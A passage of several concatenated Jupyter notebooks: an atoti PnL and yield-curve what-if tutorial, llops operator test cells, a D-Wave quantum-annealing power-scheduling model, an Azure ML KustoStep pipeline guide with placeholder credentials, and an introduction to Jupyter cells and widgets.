They could then drill-down to the *Sub Business Unit* to see its performance, the *Trading Desk* and all the way to the *Book* level.
```
h["Trading Book Hierarchy"] = {
"Business Unit": lvl["business_unit"],
"Sub Business Unit": lvl["sub_business_unit"],
"Trading Desk": lvl["trading_desk"],
"Book": lvl["book"],
}
```
### Explore the Theoretical PnL by Investment Portfolio Hierarchy
We shall explore the Theoretical PnL from the Buy-Side perspective.
Let's visualize the data in a chart to see the spread of the *Theoretical PnL* across the funds for each *Asset Class*.
```
session.visualize("Theoretical PnL spread across funds")
```
In the next 2 visualizations, we shall see the impact of having the *Investment Portfolio Hierarchy*.
In the first tree map, we perform a split at the *portfolio* level from *Investment Portfolio Hierarchy*. This means that we are drilling down from the Asset class to Sub Asset Class, Fund and then to the Portfolio level. E.g. we will see the portfolio HE01 under the Asset Class *Rates & Credit* and *Forex*.
```
session.visualize("Investment Portfolio concentration")
```
In this second tree map, we perform a split at the *portfolio* hierarchy.
Hence we will only see the collective *Theoretical PnL* of the portfolio. E.g. we will only see 1 HE01 in this map.
```
session.visualize("Portfolio concentration")
```
In the below pivot-table, we can easily drill-down the levels in the *Investment Portfolio Hierarchy* to see measures at granular levels.
Naturally, this could also be achieved by clicking on `>+` and manually adding a hierarchy to drill down to. It's just a little more tedious.
```
session.visualize("Investment Portfolio Hierarchy Pivot Table")
```
#### Yield Curve
The *Yield Curve* gives insights to the future interest rate changes and economic activity.
A normal yield curve which shows an upward curve, shows longer-term bonds having higher yields than short-term ones. Short-term interest rates are the lowest because there is less embedded inflation risk. This shows economic expansion.
An inverted curve which has a downward slope, is a sign of an upcoming recession. The shorter-term bonds yields higher than the longer-term ones.
A flat or humped yield curve shows that the yields for shorter- and longer-term bonds are very close to each other. Investors are expecting interest rates to remain about the same, probably an economic transition.
We will use the start of day and last rates against the tenor to plot our yield curve. We should be able to see a normal upward yield curve in the chart below.
```
session.visualize("Yield Curve")
```
We see that *Rates & Credit* has the highest *Theoretical PnL* among the Asset class.
```
session.visualize("Theoretical PnL")
```
By applying sensitivity against the Asset Class and Currency, we can see that the 3 peaks are in the order of *Rates & Credit, EUR*, *Forex, EUR* and lastly *Equity, EUR*.
```
session.visualize("Risk Map")
```
### What-ifs using Parameter simulations
We will run simulations to see the impact of shifts in curves:
- Parallel Shift
- Curve Inversion
- Curve Inversion Stress
#### Shift Simulation
A parallel shift in the yield curve happens when the interest rates on all fixed-income maturities increase or decrease by the same number of basis point.
The curve does not change but it shifts to the left or to the right. This is most common when the yield curve is upward sloping.
This simulation is important for investors who might liquidate their positions before maturity, as the shift can cause bond prices to fluctuate substantially.
Investors could mitigate this risk by reducing the bond duration, alleviate the volatility.
Earlier, we have created the parameter simulation `curve_simulation`.
We will use it to simulate parallel shift in yield curve by applying a negative 10 [bps](https://www.investopedia.com/ask/answers/what-basis-point-bps/) shift on the last rate for Euro currency on all Tenor.
```
curve_simulation += ("Curve Parallel Shift", None, "EUR", -0.001)
```
The above snippet creates a scenario `Curve Parallel Shift`, followed by the levels that is affected by this simulation and the value of `last parameter`.
`None` is a wildcard value, indicating that it will affect all the Tenors
##### Explore Curve Parallel Shift scenario impact on Theoretical PnL
We see that while the curve retains its shape, all the data points moved to the right of the graph.
```
session.visualize("Yield Curve Curve Parallel Shift")
```
Let's now go into the investment portfolio to see the impact of this shift on the *Theoretical PnL*. \
We see the *Theoretical PnL* went negative on a 10bps shift, with *Rates & Credit* suffering the most loss.
```
session.visualize("Theoretical PnL Parallel Shift - Investment Portfolio")
```
#### Curve Inversion Simulation
An inverted yield curve is a predictor of economic recession as it implies that interest rates are going to fall. In fact, recessions usually cause interest rates to fall.
Short-term bills are expected to plummet if recession is coming, as Federal Reserve will lower the fed funds rate when economy slows down. Therefore investors may avoid Treasurys with maturities of less than two years to have a safe investment. This sets back the demand for those bills and sends their yields up. Higher demands in the longer-term instruments lower the yields, hence an inverted curve occurs.
Let's run another simulation on the currency EUR and see the impact on the *Theoretical PnL*.
We will set `last parameter` to a negative 20bps for the currency EUR for tenors 5Y and above and observe the change in the curve shape.
```
curve_simulation += ("Curve Inversion", "5Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion", "6Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion", "7Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion", "8Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion", "9Y", "EUR", -0.002)
```
##### Explore Curve Inversion scenario impact on Theoretical PnL
We see a slight inversion in the curve from the tenor 4Y to 5Y before it becomes a shift to the right, as in the case of a parallel shift.
In this case, we predict that the yields will dip for instruments with more than 5Y maturity.
```
session.visualize("Yield Curve Inversion")
```
As expected, we can see drastic drop in the *Theoretical PnL* across all the asset classes, the greatest loss incurred in the asset class *Rates & Credit*.
```
session.visualize("Theoretical PnL Curve Inversion")
session.visualize("Theoretical PnL against Tenor")
```
#### Curve Inversion Stress Simulation
We will create a new scenario where we stress the curve further by assuming further drops in rates for the longer-term instruments.
```
curve_simulation += ("Curve Inversion Stress", "5Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion Stress", "6Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion Stress", "7Y", "EUR", -0.004)
curve_simulation += ("Curve Inversion Stress", "8Y", "EUR", -0.004)
curve_simulation += ("Curve Inversion Stress", "9Y", "EUR", -0.004)
```
##### Explore Curve Inversion Stress scenario impact on Theoretical PnL
We see the curve is starting to slope more downward.
```
session.visualize("Yield Curve Inversion Stress")
```
We see the downward slope dipped further in the stress scenario.
```
session.visualize("Theoretical PnL Curve Inversion Stress")
session.visualize("Scenarios Comparison")
```
### Build Your Standalone App using atoti UI:
* Publish Yield Curve and PnL Views
* Add Page Quick filters
* Compare scenarios
* Save Dashboards
You can access atoti UI with the link below:
```
session.link()
```
We can publish the visualizations above as widgets to atoti UI. Click on *Open App* when you have published all the widgets of interest.
<img src="https://data.atoti.io/notebooks/pnl-explained/publish_widget.gif" alt="publish widget" style="zoom:40%;" />
We can quickly put together a PnL Explained dashboard.
<img src="https://data.atoti.io/notebooks/pnl-explained/dashboarding.gif" alt="dashboard design" style="zoom:40%;" />
Access the above dashboard with the link provided below:
```
session.link(path="/#/dashboard/223")
```
<div style="text-align: center;" ><a href="https://www.atoti.io/?utm_source=gallery&utm_content=pnl-explained" target="_blank" rel="noopener noreferrer"><img src="https://data.atoti.io/notebooks/banners/discover-try.png" alt="Try atoti"></a></div>
| github_jupyter |
```
%matplotlib notebook
%load_ext autoreload
%autoreload 2
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import scipy.misc as misc
import math
import imageio
import llops.operators as ops
import llops as yp
from llops import vec
global_backend = 'numpy' # arrayfire or numpy
global_dtype = 'complex32' # complex32 or complex64
ops.setDefaultBackend(global_backend)
ops.setDefaultDatatype(global_dtype)
# Image to use when generating object
object_file_name = '../test/brain_to_scan.png'
# Color channel to use when generating object
object_color_channel = 2
# Image size to simulate
image_size = np.array([32, 64])
# Determine machine precision threshold
eps = yp.precision(global_dtype) * np.prod(image_size)
# Load object and crop to size
x_0 = yp.simulation.brain(image_size)
# Convert object to global default backend
x = yp.changeBackend(x_0)
# Generate convolution kernel h
h_size = np.array([4, 4])
h = yp.zeros(image_size, global_dtype, global_backend)
h[image_size[0] // 2 - h_size[0] // 2:image_size[0] // 2 + h_size[0] // 2,
image_size[1] // 2 - h_size[1] // 2:image_size[1] // 2 + h_size[1] // 2] = yp.randn((h_size[0], h_size[1]), global_dtype, global_backend)
h /= yp.scalar(yp.sum(yp.abs(h)))
C = ops.Convolution(h, pad_value='mean')
A = C
y = A * x
# Show object and h
plt.figure(figsize=(11,3))
plt.subplot(141)
plt.imshow(yp.abs(yp.changeBackend(x_0, 'numpy')))
plt.title('Object (x)')
plt.subplot(142)
plt.imshow(yp.abs(np.asarray(h)))
plt.title('h')
plt.subplot(143)
plt.imshow((yp.abs(np.asarray(y))))
plt.title('Measurement (h * x)');
plt.subplot(144)
plt.imshow((yp.abs(np.asarray(A.inv * y))))
plt.title('Inversion');
```
## Crop Outside of FOV
```
crop_size = (32, 32)
CR = ops.Crop(image_size, crop_size, crop_start=(0,0),pad_value='mean')
CR.arguments = {'crop_offset': (-1,-10)}
x_crop = CR * x
plt.figure()
plt.subplot(121)
plt.imshow(yp.abs(CR * x))
plt.subplot(122)
plt.imshow(yp.abs(CR.H * CR * x))
```
## Pad Outside FOV
```
crop_size = (32, 32)
CR = ops.Crop(image_size, crop_size, crop_start=(0,0))
CR.arguments = {'crop_offset': (2,33)}
x_crop = CR * x
CR.H * x_crop
crop_size = (32, 32)
CR = ops.Crop(image_size, crop_size, crop_start=(0,0))
CR.arguments = {'crop_offset': (2,33)}
x_crop = CR * x
plt.figure()
plt.subplot(121)
plt.imshow(yp.abs(CR * x))
plt.subplot(122)
plt.imshow(yp.abs(CR.H * CR * x))
```
## Make Convolution Smarter
Helper functions required:
- isDeltaFunction: Takes array, determines if it's a delta function, and gets it's position
```
sz = yp.shape(x)
kernel = yp.zeros(sz)
# kernel[50,50] = 10
kernel[20,21] = 1
# kernel[20,31] = 0.5
C1 = ops.Convolution(kernel, force_full_convolution=True)
C2 = ops.Convolution(kernel)
print(C1)
print(C2)
plt.figure(figsize=(11,4))
plt.subplot(131)
plt.imshow(yp.abs(x))
plt.colorbar()
plt.subplot(132)
plt.imshow(yp.abs(C1 * x))
plt.colorbar()
plt.subplot(133)
plt.imshow(yp.abs(C2 * x))
plt.colorbar()
print(yp.amax(x))
print(yp.amax(yp.abs(C1 * x)))
print(yp.amax(yp.abs(C2 * x)))
np.sum(np.abs(C1 * x - C2 * x))
```
## Add Inner-Operators to Convolution
This will be removed if the operator is broken up
```
C = ops.Convolution(s0, inside_operator=F.H * H, mode='circular')
s0
yp.where(F.H * H * s1)
s0 = yp.zeros((2,1))
s1 = yp.ones((2,1)) * 10
H = ops.PhaseRamp(image_size)
F = ops.FourierTransform(image_size, center=True, pad=True)
C = ops.Convolution(s1, inside_operator=F.H * H, mode='circular', force_full=False)
C2 = ops.Convolution(s1, inside_operator=F.H * H, mode='circular', force_full=True)
C.arguments = {'kernel': s1}
plt.figure(figsize=(11,3))
plt.subplot(121)
plt.imshow(yp.abs(C2.inv * x))
plt.subplot(122)
plt.imshow(yp.abs(C.inv * x))
```
## Inverting Single Operators
```
F = ops.FourierTransform(h.shape)
A = F.H * ops.Diagonalize((F * h), inverse_regularizer=1e-10) * F
y = A * x
yp.abs(A.inv * y)
plt.figure(figsize=(12,4))
plt.subplot(131)
plt.imshow(yp.abs(x))
plt.colorbar()
plt.subplot(132)
plt.imshow(yp.abs(y))
plt.colorbar()
plt.subplot(133)
plt.imshow(yp.abs(A.inv * y))
plt.colorbar()
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Check inverse
V = ops.Vstack(operators)
assert all(yp.vec(V.inv * (V * x)) == vec(x))
# Check gradient
V.gradient_check()
# Print latex
V.latex()
V.latex(gradient=True)
```
## Vertical Stacking and Inverses
```
print(V.is_stack)
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Check inverse calculation
V = ops.Vstack(operators, normalize=False)
plt.figure(figsize=(14,4))
plt.subplot(141)
plt.imshow(yp.abs(x))
plt.title('$x$')
plt.colorbar()
plt.subplot(142)
plt.imshow(yp.abs(V * x))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(143)
plt.imshow(yp.abs(V.H * V * x))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(144)
plt.imshow(yp.abs(V.inv * V * x))
plt.title('$A^{-1} A x$')
plt.colorbar()
```
## Applying Offsets to Crop Operators
```
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Set crop offsets
args = operators[1].arguments
args['crop_offset'] = (0,10)
operators[1].arguments = args
# Check inverse calculation
V = ops.Vstack(operators, normalize=False)
plt.figure(figsize=(14,4))
plt.subplot(141)
plt.imshow(yp.abs(x))
plt.title('$x$')
plt.colorbar()
plt.subplot(142)
plt.imshow(yp.abs(V * x))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(143)
plt.imshow(yp.abs(V.H * V * x))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(144)
plt.imshow(yp.abs(V.inv * V * x))
plt.title('$A^{-1} A x$')
plt.colorbar()
```
## Applying Offsets to Stacked Crop Operators After Formation
```
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Check inverse calculation
V = ops.Vstack(operators, normalize=False)
# Set crop offsets
args = V.arguments
args[1]['crop_offset'] = (0,10)
operators[1].arguments = args
# Plot
plt.figure(figsize=(14,4))
plt.subplot(141)
plt.imshow(yp.abs(x))
plt.title('$x$')
plt.colorbar()
plt.subplot(142)
plt.imshow(yp.abs(V * x))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(143)
plt.imshow(yp.abs(V.H * V * x))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(144)
plt.imshow(yp.abs(V.inv * V * x))
plt.title('$A^{-1} A x$')
plt.colorbar()
```
## Speed Optimization For Crop Operators
```
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Check inverse calculation
V = ops.Vstack(operators)
y = V * x
yy = yp.zeros(V.stack_operators[0].M)
%timeit V.stack_operators[0].H * yy + V.stack_operators[1].H * yy + V.stack_operators[2].H * yy
%timeit sum([V.stack_operators[i].H * y[V.idx[i]:V.idx[i + 1], :] for i in range(V.nops)])
%timeit V.H * y
```
## Inverting Diagonalized Operators
```
# Convolution operators
c = ops.Convolution(h, inverse_regularizer=0)
conv_ops = [c] * 3
# Create operators
C = ops.Dstack(conv_ops)
# Create measurements
x3 = ops.VecStack([x] * 3)
# Composite Operator
y = C * ops.VecStack(x3)
C.latex()
# Perform inversion
x_star = C.inv * y
# Show results
plt.figure(figsize=(14,4))
plt.subplot(141)
plt.imshow(yp.abs(x3))
plt.title('$x$')
plt.colorbar()
plt.subplot(142)
plt.imshow(yp.abs(C * x3))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(143)
plt.imshow(yp.abs(C.H * C * x3))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(144)
plt.imshow(yp.abs(C.inv * C * x3))
plt.title('$A^{-1} A x$')
plt.colorbar()
```
## Combining Crops and Convolution Operators for Inversion
```
# Crop operations
crop_ops = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Convolution operators
h_crop = crop_ops[1] * h#yp.rand(h.shape)
conv_ops = [ops.Convolution(h_crop, inverse_regularizer=0)] * 3
# Create operators
C = ops.Dstack(conv_ops)
X = ops.Vstack(crop_ops)
# Composite Operator
A = C * X
y = A * x
A.latex()
# Perform inversion
x_star = A.inv * y
# Show results
plt.figure(figsize=(14,4))
plt.subplot(151)
plt.imshow(yp.abs(x))
plt.title('$x$')
plt.colorbar()
plt.subplot(152)
plt.imshow(yp.abs(A * x))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(153)
plt.imshow(yp.abs(A.H * A * x))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(154)
plt.imshow(yp.abs(A.inv * A * x))
plt.title('$A^{-1} A x$')
plt.colorbar()
plt.subplot(155)
plt.imshow(yp.abs(A.inv * A * x - x))
plt.title('$A^{-1} A x - x$')
plt.colorbar()
```
## Operator inside Diagonalize
```
# Create phase ramp to diagonalize
H = ops.PhaseRamp(image_size)
s = yp.rand((2,1))
# Create diagonalized phase ramp operator
D = ops.Diagonalize(s, inside_operator=H)
# Check that inside operator is set correctly
assert yp.sum(yp.abs(D * x - ((H * s) * x))) == 0.0
# Check gradient
D.gradient_check()
# Render Latex
D.latex()
```
## Equality Testing
```
D1 = ops.Diagonalize(h)
D_eq = ops.Diagonalize(h)
D_neq = ops.Diagonalize(yp.zeros_like(h))
# Ensure equality is correct
assert D1 == D_eq
# Ensure inequality is correct
assert not D1 == D_neq
F = ops.FourierTransform(image_size, center=True)
F_neq = ops.FourierTransform(image_size, center=False)
F_eq = ops.FourierTransform(image_size, center=True)
assert F == F_eq
assert not F == F_neq
assert F == F_eq
assert not F == F_neq
```
| github_jupyter |
# Larger network power optimization with realistic scenarios for renewable energy sources
```
import pandas as pd
import warnings
import numpy as np
from dwave.system.samplers import LeapHybridSampler, DWaveSampler
from dimod import BinaryQuadraticModel, ExactSolver
from dwave.system.composites import EmbeddingComposite
from neal import SimulatedAnnealingSampler
from datetime import datetime as dt
from matplotlib import pyplot as plt
from src.utils.BQM import multisource_plot
import dimod
```
# Input Data
The input data for the demand is the same as used in the main notebook.
## Power Demand
Here we use real data sets from the sources below to test our algorithm. We import the hour by hour load and generation cost data for Italy in 2014.
Power Demand: https://www.entsoe.eu/data/data-portal/
Generation costs https://www.eia.gov/electricity/annual/html/epa_08_04.html
```
IT_data = pd.read_excel('./data/Monthly-hourly-load-values_2014_IT.xlsx')
demand = []
for i in range(len(IT_data)):
demand += list((IT_data.iloc[i,6:30]))
```
## Renewable energy production
The production of renewables such as solar and wind power comes with a variability that is important to model in these types of simulations. We can model this with a coefficient called a capacity factor. The capicity factor tells us at what percentage of its maximum output it is producing during any specific hour of the day.
### Variability of Solar Power
The [**duck curve**](https://en.wikipedia.org/wiki/Duck_curve) is a graph of power production over the course of a day that shows the timing imbalance between peak demand and renewable energy production. Clearly, for solar energy, more solar power is generated when the sun is out.
We model this with a set of capacity factors that approach 1 during daylight hours, while tend to 0 for the night hours.
```
# Solar Production capacity factors over a day
solar_capacity_factors = [0,0,0,0,0,0,0.02,0.14,0.64,0.8,0.93,0.96,0.98,0.99,0.99,0.96,0.66,0.26,0.02,0,0,0,0,0]
plt.plot(solar_capacity_factors[0:24], label='demand')
plt.xlabel('Hours of the day')
plt.title('Solar Capacity Factors')
plt.show()
```
### Variability of Wind Power
Wind power is intrinsically stochastic. Such stochasticity can be modeled by adding a volatile (random) component to the capacity factors. We use a capacity factor as being baseline at an average of 50% +/- %50 modeling the wind blowing more or less strongly (variability of 30%).
```
# Variable wind capacity factors over a day
wind_capacity_factors = []
for i in range(24):
wind_var =0.5*np.random.random() # accounts for variance of the wind
wind_capacity_factors.append(0.5 + 0.5*wind_var)
plt.plot(wind_capacity_factors[0:24], label='demand')
plt.xlabel('Hours of the day')
plt.title('Wind Capacity Factors')
plt.show()
```
## Plant Operating Cost
In this section we consider six categories of power generation:
Nuclear, Coal, Hydro, Gas, Solar, and Wind.
We collect average operating costs for the different types of generation from the source below.
They include three numbers in milles per kwh:
Operating Costs, Maintanence Costs, Fuel Costs
https://www.eia.gov/electricity/annual/html/epa_08_04.html
### Nuclear 'n', Coal 'c', Hydro 'h', Gas 'g', Solar 's', Wind 'w'
```
#Operating costs by plant type(Operation,Maintenance,Fuel) mills per kwh
operating_costs = [('n',11.17+7.06+7.48),('c',5.16+5.41+26.70),('h',8.37+5.06),('g',2.34+2.68+28.22),('s',5.16+5.41),('w',5.16+5.41)]
sources = [operating_costs[i][0] for i in range(len(operating_costs))]
```
# Optimization
Running over 1 days at 24 hourly intervals.
Here we look at the effect of switching costs, emission, and amount of power generation.
The order of the indices correspond to the order of the title above.
```
np.random.seed(123)
n_schedules = 24
# define binary variables
schedules = [f's_{i}' for i in range(n_schedules)]
n_energy_sources = len(sources)
#2000 is a normalization factor scaling the total demand in Italy to the size of your problem
demand_schedule = [i/2000 for i in demand[0:n_schedules]]
#Defining capacity factors for all power sources
capacity_factors = [[1]*24 for i in range(len(sources))]
capacity_factors[4]= solar_capacity_factors
capacity_factors[5]=wind_capacity_factors
cost_usage = [operating_costs[i][1] for i in range(len(operating_costs))]
# define the cost to switch off/on one of the energy sources
# nuclear is expensive to turn on/off for example, gas can switch on quickly
cost_switch = [50, 8, 2, 1,1,1]
# define the carbon emission per kWh
#Coal and Gas have high emissions while renewables have much lower emissions
cost_emission = [0, 20, 2, 20,0,0]
#Power generation per type
#Here is the basic max power generation capacity for each type of power
power_generation = [6, 6, 3, 5,8,6]
```
# Defining our BQM
```
# define BQM
bqm = BinaryQuadraticModel(dimod.BINARY)
# add a variable for each schedule and energy source
for s in schedules:
for alpha in sources:
bqm.add_variable(s+alpha)
# Objective
# linear components
for i in range(n_schedules):
for alpha in range(n_energy_sources):
bqm.set_linear(f's_{i}'+sources[alpha], (cost_usage[alpha] + cost_emission[alpha]))
# Constraints
# Switching Constraints
for i in range(n_schedules-1):
for alpha in range(n_energy_sources):
for beta in range(n_energy_sources):
if alpha != beta:
bqm.set_quadratic(f's_{i}'+sources[alpha], f's_{i+1}'+sources[beta], cost_switch[alpha] + cost_switch[beta])
# lb <= \sum_{i,k} a_{i,k} x_{i,k} + constant <= ub
# equality constraint: power > demand
for i in range(n_schedules):
for alpha in range(n_energy_sources):
bqm.add_linear_equality_constraint(
[(f's_{i}'+sources[alpha], capacity_factors[alpha][i]*power_generation[alpha]) for alpha in range(n_energy_sources)],
constant=-demand_schedule[i],
lagrange_multiplier=800,
)
```
# Running the Simulation
## Leap Hybrid Solver
First we run the optimization on the leap hybrid annealer.
```
# Leap hybrid solver
sampler = LeapHybridSampler()
res = sampler.sample(bqm, time_limit=50)
#print(res.aggregate())
df = res.aggregate().to_pandas_dataframe()
multisource_plot(df,sources,power_generation,demand_schedule,capacity_factors,'hybrid')
```
## Simulated Annealing
Next we test our QUBO on simulated annealer plotting the results.
```
# Simulated annealing
classical_sampler = SimulatedAnnealingSampler()
start = dt.now()
classical_res = classical_sampler.sample(bqm,num_reads=1)
#print(classical_res.aggregate())
df = classical_res.aggregate().to_pandas_dataframe()
df=df[df.energy == df.energy.min()]
multisource_plot(df,sources,power_generation,demand_schedule,capacity_factors,gtype = 'sa')
```
## Running on QPU
```
# # QPU solver
sampler = EmbeddingComposite(DWaveSampler(solver='DW_2000Q_6',num_reads=1))
res = sampler.sample(bqm)
#print(res.aggregate())
df = res.aggregate().to_pandas_dataframe()
df=df[df.energy == df.energy.min()]
del df['chain_break_fraction']
multisource_plot(df,sources,power_generation,demand_schedule,capacity_factors,'qpu')
```
| github_jupyter |
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.

# Azure Machine Learning Pipeline with KustoStep
To use Kusto as a compute target from [Azure Machine Learning Pipeline](https://aka.ms/pl-concept), a KustoStep is used. A KustoStep enables the functionality of running Kusto queries on a target Kusto cluster in Azure ML Pipelines. Each KustoStep can target one Kusto cluster and perform multiple queries on them. This notebook demonstrates the use of KustoStep in Azure Machine Learning (AML) Pipeline.
## Before you begin:
1. **Have an Azure Machine Learning workspace**: You will need details of this workspace later on to define KustoStep.
2. **Have a Service Principal**: You will need a service principal and use its credentials to access your cluster. See [this](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal) for more information.
3. **Have a Blob storage**: You will need a Azure Blob storage for uploading the output of your Kusto query.
## Azure Machine Learning and Pipeline SDK-specific imports
```
import os
import azureml.core
from azureml.core.runconfig import JarLibrary
from azureml.core.compute import ComputeTarget, KustoCompute
from azureml.exceptions import ComputeTargetException
from azureml.core import Workspace, Experiment
from azureml.pipeline.core import Pipeline, PipelineData
from azureml.pipeline.steps import KustoStep
from azureml.core.datastore import Datastore
from azureml.data.data_reference import DataReference
# Check core SDK version number
print("SDK version:", azureml.core.VERSION)
```
## Initialize Workspace
Initialize a workspace object from persisted configuration. If you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, make sure you go through the [configuration Notebook](https://aka.ms/pl-config) first if you haven't.
```
ws = Workspace.from_config()
print(ws.name, ws.resource_group, ws.location, ws.subscription_id, sep = '\n')
```
## Attach Kusto compute target
Next, you need to create a Kusto compute target and give it a name. You will use this name to refer to your Kusto compute target inside Azure Machine Learning. Your workspace will be associated to this Kusto compute target. You will also need to provide some credentials that will be used to enable access to your target Kusto cluster and database.
- **Resource Group** - The resource group name of your Azure Machine Learning workspace
- **Workspace Name** - The workspace name of your Azure Machine Learning workspace
- **Resource ID** - The resource ID of your Kusto cluster
- **Tenant ID** - The tenant ID associated to your Kusto cluster
- **Application ID** - The Application ID associated to your Kusto cluster
- **Application Key** - The Application key associated to your Kusto cluster
- **Kusto Connection String** - The connection string of your Kusto cluster
```
compute_name = "<compute_name>" # Name to associate with new compute in workspace
# Account details associated to the target Kusto cluster
resource_id = "<resource_id>" # Resource ID of the Kusto cluster
kusto_connection_string = "<kusto_connection_string>" # Connection string of the Kusto cluster
application_id = "<application_id>" # Application ID associated to the Kusto cluster
application_key = "<application_key>" # Application Key associated to the Kusto cluster
tenant_id = "<tenant_id>" # Tenant ID associated to the Kusto cluster
try:
kusto_compute = KustoCompute(workspace=ws, name=compute_name)
print('Compute target {} already exists'.format(compute_name))
except ComputeTargetException:
print('Compute not found, will use provided parameters to attach new one')
config = KustoCompute.attach_configuration(resource_group=ws.resource_group, workspace_name=ws.name,
resource_id=resource_id, tenant_id=tenant_id,
kusto_connection_string=kusto_connection_string,
application_id=application_id, application_key=application_key)
kusto_compute=ComputeTarget.attach(ws, compute_name, config)
kusto_compute.wait_for_completion(True)
```
## Setup output
To use Kusto as a compute target for Azure Machine Learning Pipeline, a KustoStep is used. Currently KustoStep only supports uploading results to Azure Blob store. Let's define an output datastore via PipelineData to be used in KustoStep.
```
from azureml.pipeline.core import PipelineParameter
# Use the default blob storage
def_blob_store = Datastore.get(ws, "workspaceblobstore")
print('Datastore {} will be used'.format(def_blob_store.name))
step_1_output = PipelineData("output", datastore=def_blob_store)
```
# Add a KustoStep to Pipeline
Adds a Kusto query as a step in a Pipeline.
- **name:** Name of the Module
- **compute_target:** Name of Kusto compute target
- **database_name:** Name of the database to perform Kusto query on
- **query_directory:** Path to folder that contains only a text file with Kusto queries (see [here](https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/) for more details on Kusto queries).
- If the query is parameterized, then the text file must also include any declaration of query parameters (see [here](https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/queryparametersstatement?pivots=azuredataexplorer) for more details on query parameters declaration statements).
- An example of the query text file could just contain the query "StormEvents | count | as HowManyRecords;", where StormEvents is the table name.
- Note. the text file should just contain the declarations and queries without quotation marks around them.
- **outputs:** Output binding to an Azure Blob Store.
- **parameter_dict (optional):** Dictionary that contains the values of parameters declared in the query text file in the **query_directory** mentioned above.
- Dictionary key is the parameter name, and dictionary value is the parameter value.
- For example, parameter_dict = {"paramName1": "paramValue1", "paramName2": "paramValue2"}
- **allow_reuse (optional):** Whether the step should reuse previous results when run with the same settings/inputs (default to False)
```
database_name = "<database_name>" # Name of the database to perform Kusto queries on
query_directory = "<query_directory>" # Path to folder that contains a text file with Kusto queries
kustoStep = KustoStep(
name='KustoNotebook',
compute_target=compute_name,
database_name=database_name,
query_directory=query_directory,
output=step_1_output,
)
```
# Build and submit the Experiment
```
steps = [kustoStep]
pipeline = Pipeline(workspace=ws, steps=steps)
pipeline_run = Experiment(ws, 'Notebook_demo').submit(pipeline)
pipeline_run.wait_for_completion()
```
# View Run Details
```
from azureml.widgets import RunDetails
RunDetails(pipeline_run).show()
```
| github_jupyter |
# Cells
### Markdown (text) cells
You can
- Write __rich__ly _formatted_ `notes`
- Display equations and derivations, inline $\alpha^2 = 15x$, or not
$$
E = m\,c^2
$$
- Embed plots, images, video, HTML, ...
It's a great place for data exploration and logging your research progress next to your code.
```
from IPython.display import Image
Image(url='http://i.telegraph.co.uk/multimedia/archive/02830/cat_2830677b.jpg', width=300)
```
### Code cells
Code cells allow you to write and execute Python code in blocks. This is a bit nicer than the standard interpreter, where you have to do it line-by-line. This is especially helpful when you have to re-run some code -- you can just re-run the whole cell, instead of running each line independently. To run the code, use:
* Shift + Enter : Runs cell and moved to next cell
* Ctrl + Enter : Runs cell, stays in cell
In the backend, code cells use the IPython interpreter, and thus has all of the same magic functions, tab complete, and extra help features that we have already seen.
```
for i in range(4):
print('cool')
```
Jupyter / IPython also provide some extra features over the standard interpreter:
```
# Bash commands: add ! at the start of the line
!ls -l
# Help
int?
# "Magic" functions
%timeit range(100)
%lsmagic
```
An example: code profiling
```
import numpy as np
def force(xyz):
return -xyz / np.sum(xyz**2, axis=0)[None]**1.5
%%prun -s cumulative
xyz = np.random.normal(size=(3, 1024))
F = np.zeros_like(xyz)
for i in range(xyz.shape[1]):
F[:,i] = force(xyz).sum()
```
# Plots
#### In a separate window
```
%matplotlib qt5
import matplotlib.pyplot as plt
plt.plot(range(10))
plt.show()
```
#### Kind-of interactive plots
_(restart kernel before running)_
```
import matplotlib.pyplot as plt
%matplotlib notebook
plt.plot(range(10));
```
#### Inline plots: static images
_(restart kernel before running)_
```
import matplotlib.pyplot as plt
%matplotlib inline
plt.plot(range(10));
```
# Widgets
More info: https://github.com/ipython/ipython-in-depth/tree/master/examples/Interactive%20Widgets
```
from ipywidgets import interact, fixed
import ipywidgets as widgets
def f(x):
return x
interact(f, x=10);
from astropy.modeling.functional_models import Gaussian1D
def plot_gaussian(fig, stddev):
